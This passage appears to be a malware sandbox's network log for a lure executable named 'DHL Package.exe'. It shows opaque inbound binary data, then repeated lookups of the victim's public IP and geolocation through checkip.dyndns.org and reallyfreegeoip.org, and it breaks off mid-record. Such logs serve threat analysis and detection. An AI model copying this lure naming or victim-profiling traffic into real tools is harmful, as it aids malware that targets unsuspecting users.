Aug 7, 2024 09:28:15.600677967 CEST	1289	IN	Data Raw: 52 7f e2 15 3d 52 8f cc 24 5a bb fe d3 68 12 57 ec 50 10 39 21 81 6d 2c 79 ee 85 cc e2 ed c1 04 c9 e6 80 9d 6e 85 d8 bd 6a 30 d6 6d 0b 17 74 6b 38 77 c3 53 81 be 0b db 35 6d 95 5c b4 c9 b8 b4 19 81 5a 70 b8 ff 5a c7 07 4d 75 d7 d9 9f bf 6e d6 51 Data Ascii: R=R$ZhWP9!m,ynj0mtk8wS5m\ZpZMunQy2Q7~aYXsyZDBl\0iZ;q\|bf1Ep]?%A!x#Z}zs\|,)hIj",8/E.xU(@-MARfdox@9i]H'sKm@
Aug 7, 2024 09:28:15.602659941 CEST	1289	IN	Data Raw: 4c b6 50 53 5f 2b 37 7b ff b0 f2 63 ec 17 9d ae dd 3c 50 bd 80 d3 1b e2 a7 57 14 fe 93 08 c2 da 37 23 2f eb fd 61 ee a5 76 c8 f2 80 09 84 3c 6d ff e8 07 d9 c0 de 06 0a f4 37 85 17 f4 e0 80 e6 3e 9c 34 a5 cc 09 75 14 03 00 85 99 1b 9d 53 2c df 83 Data Ascii: LPS_+7{c<PW7#/av<m7>4uS,I%mI!xD3;G#X~h-2>jsbA`4lon\S>Yb`&i~foPWQ1KDl5;u8qIBbMCQymTu{@(sX]3
Aug 7, 2024 09:28:15.602754116 CEST	1289	IN	Data Raw: 7e e0 ed 6c cc 40 2e d9 91 98 c2 52 e9 21 fd 70 66 bb 2d 58 5b a1 e7 17 b0 72 aa 8b e0 e1 bc e7 5e c8 5c c4 65 da a1 76 e0 40 ed ba 11 b7 aa 65 75 1e a0 20 b1 a1 25 25 9e aa 76 a1 98 0c 1c f7 f9 0a 9c 80 0a 95 b8 74 98 20 5f f9 31 33 0f 8e f8 59 Data Ascii: ~l@.R!pf-X[r^\ev@eu %%vt _13YhH@<}ERwrj F(@G&VN^Y2[)kcEU!x+'DZkh\t6*"^;tbH`eA
Aug 7, 2024 09:28:15.604878902 CEST	1289	IN	Data Raw: 23 60 8c b3 44 07 9a ff 8e 58 c7 c1 95 f0 cd e2 98 ed a5 25 70 20 47 97 a0 a3 d2 2b 85 0a bf ea 39 38 22 8d 0d 9e bc 21 6e f0 40 5b 03 7e 86 43 6e bf f9 a1 00 ba a5 d1 10 18 6e 9a ae 35 47 cb 97 53 e6 de 72 cf c0 4e da 5b d2 20 87 5d 12 09 a5 8d Data Ascii: #`DX%p G+98"!n@[~Cnn5GSrN[ ]"mhhjTahSIFhr!`.-ww-[B#x4?v{>D(?QZF!uDk(rQ&,7h58kF!w:P(.\5>al>{2E
Aug 7, 2024 09:28:15.604979992 CEST	1289	IN	Data Raw: 51 22 25 1d 1d 4e 15 7f e2 9d 65 e2 00 cb 22 d8 f1 96 0c 52 87 f3 9f 28 35 c0 fd 23 33 8a 61 2a 77 ba 2e 44 ab 0f 25 33 d1 4f 51 a8 d7 ce b2 5f 81 33 6f c2 f9 35 6b 03 5c 7b 5e b1 e0 a7 7f db 16 81 32 51 be a2 a4 26 7b e1 a5 6d 48 96 dd 10 0e 73 Data Ascii: Q"%Ne"R(5#3a*w.D%3OQ_3o5k\{^2Q&{mHssX~k-j~eDR)]8hf Fu=C~N6AX\|n^6a4ffOBB!J_N(@-m%Y#der__O7H9Dv"vS]N"s
Aug 7, 2024 09:28:15.606971025 CEST	1289	IN	Data Raw: 6d 22 0c 85 d4 19 6b 94 48 36 e3 f5 01 c2 a0 98 74 1d b9 8f cc f4 a1 0f 05 7b 9f 5d fc c6 63 d4 80 b4 fb b0 26 74 f3 f7 43 8a b5 d1 fe c5 9c 28 9e 5b 7b 6e 2c 60 50 75 15 9e 9e 04 90 76 33 8d e2 67 96 2c 81 14 b2 29 30 8b 06 0c 33 6d 6e e0 ab 4a Data Ascii: m"kH6t{]c&tC([{n,`Puv3g,)03mnJNq<X3DL2 ~KA+27='_yN~ 4b!tf#"1r7?;K2X>QqK^Ti,O 2f6hzCZjsa/Xd54
Aug 7, 2024 09:28:15.607065916 CEST	1289	IN	Data Raw: 6d 7a 4b 53 b6 fc 34 62 7c d1 52 36 ed be f3 df b0 af af b9 d3 b0 75 dc e9 b5 a0 39 b5 da 3e 7b 1e a0 37 99 e8 34 25 96 f0 32 b9 98 76 e1 4e ef f4 94 e4 dc 99 b0 52 94 76 2d f9 31 3d 13 1e f8 59 ba 7b 58 df c8 4a 26 13 48 98 0f 0e 35 a5 ef d5 d3 Data Ascii: mzKS4b\|R6u9>{74%2vNRv-1=Y{XJ&H53X3wVzED<$\|X!MP1qS4})aEQAx=YA\|QIkO]9{X(i/O+:* G/)WgpEun+.?N
Aug 7, 2024 09:28:15.832040071 CEST	1289	IN	Data Raw: 9f ab 3c 70 41 6f dd d3 2b d8 89 9b 15 d8 4b 8e 38 28 8b 0b 37 bd 21 1f f6 5e d1 27 2d 91 42 0d d4 49 89 8a b0 a5 dc 6d 5c 16 9a aa 41 04 40 97 57 9f 74 77 de cf 37 71 5f c4 34 af af 22 09 af 89 fc d1 d4 6a ea 64 b7 6a e4 da 26 8d fb f7 1e 61 de Data Ascii: <pAo+K8(7!^'-BIm\A@Wtw7q_4"jdj&a&XBlNrLj2nS_S'}+B~9?P&p(#26Q-IB'ZuPD87saT,7{`saA#o(tZ:C)p5%7/wJQnDCe3>fd

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.11.20	49741	132.226.247.73	80	4252	C:\Users\user\Desktop\DHL Package.exe

Timestamp	Bytes transferred	Direction	Data
Aug 7, 2024 09:28:17.469244957 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Aug 7, 2024 09:28:17.800096035 CEST	324	IN	HTTP/1.1 200 OK Date: Wed, 07 Aug 2024 07:28:17 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 89019246474c92dab75ab264f6a1fe46 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 32 35 32 2e 31 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.252.169</body></html>
Aug 7, 2024 09:28:17.825790882 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Aug 7, 2024 09:28:18.156982899 CEST	324	IN	HTTP/1.1 200 OK Date: Wed, 07 Aug 2024 07:28:17 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7b4c4782f8abbc616f23ec3878135404 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 32 35 32 2e 31 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.252.169</body></html>
Aug 7, 2024 09:28:19.693484068 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Aug 7, 2024 09:28:20.025669098 CEST	324	IN	HTTP/1.1 200 OK Date: Wed, 07 Aug 2024 07:28:19 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a8f1c708ccea8c194751045ac5dd83c0 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 32 35 32 2e 31 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.252.169</body></html>
Aug 7, 2024 09:28:20.755336046 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Aug 7, 2024 09:28:21.088993073 CEST	324	IN	HTTP/1.1 200 OK Date: Wed, 07 Aug 2024 07:28:20 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5a317810e1b1195dcd9bde0de0aa7e52 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 32 35 32 2e 31 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.252.169</body></html>
Aug 7, 2024 09:28:21.810622931 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Aug 7, 2024 09:28:22.142910004 CEST	324	IN	HTTP/1.1 200 OK Date: Wed, 07 Aug 2024 07:28:21 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 9913221286d3d865c545e310d3363229 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 32 35 32 2e 31 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.252.169</body></html>
Aug 7, 2024 09:28:22.865736008 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Aug 7, 2024 09:28:23.197529078 CEST	324	IN	HTTP/1.1 200 OK Date: Wed, 07 Aug 2024 07:28:23 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f4bd2380ee8f88f5c239a68ac54fd497 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 32 35 32 2e 31 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.252.169</body></html>
Aug 7, 2024 09:28:23.932697058 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Aug 7, 2024 09:28:24.264518023 CEST	324	IN	HTTP/1.1 200 OK Date: Wed, 07 Aug 2024 07:28:24 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 01f040bd0228855b228d9cb6f3e45b26 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 32 35 32 2e 31 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.252.169</body></html>
Aug 7, 2024 09:28:24.989842892 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Aug 7, 2024 09:28:25.339840889 CEST	324	IN	HTTP/1.1 200 OK Date: Wed, 07 Aug 2024 07:28:25 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 63dc0a2da75cd6fdf4946de1351af56a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 32 35 32 2e 31 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.252.169</body></html>
Aug 7, 2024 09:28:26.063566923 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Aug 7, 2024 09:28:26.395008087 CEST	324	IN	HTTP/1.1 200 OK Date: Wed, 07 Aug 2024 07:28:26 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0ac295c22cd98eaabe2609d246b8aa79 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 32 35 32 2e 31 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.252.169</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49742	172.67.177.134	443	4252	C:\Users\user\Desktop\DHL Package.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-07 07:28:19 UTC	88	OUT	GET /xml/102.129.252.169 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-08-07 07:28:19 UTC	705	IN	HTTP/1.1 200 OK Date: Wed, 07 Aug 2024 07:28:19 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: MISS Last-Modified: Wed, 07 Aug 2024 07:28:19 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AVqyU2Lob6FkMaR%2BWdqpshCvB2I7pWKVXW7RyCrKFzHxYZo2xQv65ksj4UO3oeEKflMjFXINV3%2Bv3HC6%2Bqn4uHlMyVsnjcM%2FZiXMMc8IlK0%2FcQK%2BGVgWi%2BgZRltQ%2BzDErRpMvjIz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8af58c99baf5159a-SJC alt-svc: h3=":443"; ma=86400
2024-08-07 07:28:19 UTC	381	IN	Data Raw: 31 37 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 32 35 32 2e 31 36 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 176<Response><IP>102.129.252.169</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90002</ZipCode><TimeZone>America/Los
2024-08-07 07:28:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.11.20	49743	172.67.177.134	443	4252	C:\Users\user\Desktop\DHL Package.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-07 07:28:20 UTC	64	OUT	GET /xml/102.129.252.169 HTTP/1.1 Host: reallyfreegeoip.org
2024-08-07 07:28:20 UTC	700	IN	HTTP/1.1 200 OK Date: Wed, 07 Aug 2024 07:28:20 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 1 Last-Modified: Wed, 07 Aug 2024 07:28:19 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sIjDYHFguCnhflF8Ik0IgTYTeYHGe25k2pw4GrIcxkA5aYH4QXGf8TOBsNJD8FYQ7iHFyXM%2Bu232Gcz4dlM6VjTavI6DV1ULQBr09989Zlxn3%2FKUCu8D8Qv2o0jfeK3kPQQCLeLc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8af58ca128ebf98f-SJC alt-svc: h3=":443"; ma=86400
2024-08-07 07:28:20 UTC	381	IN	Data Raw: 31 37 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 32 35 32 2e 31 36 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 176<Response><IP>102.129.252.169</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90002</ZipCode><TimeZone>America/Los
2024-08-07 07:28:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.11.20	49744	172.67.177.134	443	4252	C:\Users\user\Desktop\DHL Package.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-07 07:28:21 UTC	64	OUT	GET /xml/102.129.252.169 HTTP/1.1 Host: reallyfreegeoip.org
2024-08-07 07:28:21 UTC	708	IN	HTTP/1.1 200 OK Date: Wed, 07 Aug 2024 07:28:21 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 2 Last-Modified: Wed, 07 Aug 2024 07:28:19 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bqIAykXX9%2BaXkA70%2Fx8o5iUx%2Bm3WhYzZCmo3urIct6zEF0xGRP3svuj4WBtD04LBJarcB8hbpWrmp%2FV7WoZrlXMThsEkMOaoyOo0OAo2%2Ftf6qxubbg4k6BBihPeIQEMH%2FkCeUELH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8af58ca7cd1515a4-SJC alt-svc: h3=":443"; ma=86400
2024-08-07 07:28:21 UTC	381	IN	Data Raw: 31 37 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 32 35 32 2e 31 36 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 176<Response><IP>102.129.252.169</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90002</ZipCode><TimeZone>America/Los
2024-08-07 07:28:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.11.20	49745	172.67.177.134	443	4252	C:\Users\user\Desktop\DHL Package.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-07 07:28:22 UTC	64	OUT	GET /xml/102.129.252.169 HTTP/1.1 Host: reallyfreegeoip.org
2024-08-07 07:28:22 UTC	700	IN	HTTP/1.1 200 OK Date: Wed, 07 Aug 2024 07:28:22 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 3 Last-Modified: Wed, 07 Aug 2024 07:28:19 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uDGp67EKEerd2i3EB1BJ5YyJOsG9Wp3mvLvQ7DcJl2F4kdpLZ9HKl3Lh91zSz2xl%2BbbKv0rZkCF1Pl1OH%2FBv1UA5mgwPPfZeLBVWC6aX7hRtumMX7DpCbri11PkWfbmvYCamiR2x"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8af58cae5c33d02d-SJC alt-svc: h3=":443"; ma=86400
2024-08-07 07:28:22 UTC	381	IN	Data Raw: 31 37 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 32 35 32 2e 31 36 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 176<Response><IP>102.129.252.169</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90002</ZipCode><TimeZone>America/Los
2024-08-07 07:28:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.11.20	49746	172.67.177.134	443	4252	C:\Users\user\Desktop\DHL Package.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-07 07:28:23 UTC	64	OUT	GET /xml/102.129.252.169 HTTP/1.1 Host: reallyfreegeoip.org
2024-08-07 07:28:23 UTC	708	IN	HTTP/1.1 200 OK Date: Wed, 07 Aug 2024 07:28:23 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 4 Last-Modified: Wed, 07 Aug 2024 07:28:19 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dNVta3gudZ8KfHE7fqE7GMXxZhcQRp%2BaEQOLabr%2FCrIiaTUgJKEYc4xvqLAwNOJjTemGladDGSJY%2BYhnaL1iV2irY9kR2dBeg%2Brja%2BnennKlP2eftOhB7OSf6%2FS0gvKKjUuRc3iS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8af58cb4f882f9cc-SJC alt-svc: h3=":443"; ma=86400
2024-08-07 07:28:23 UTC	381	IN	Data Raw: 31 37 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 32 35 32 2e 31 36 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 176<Response><IP>102.129.252.169</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los 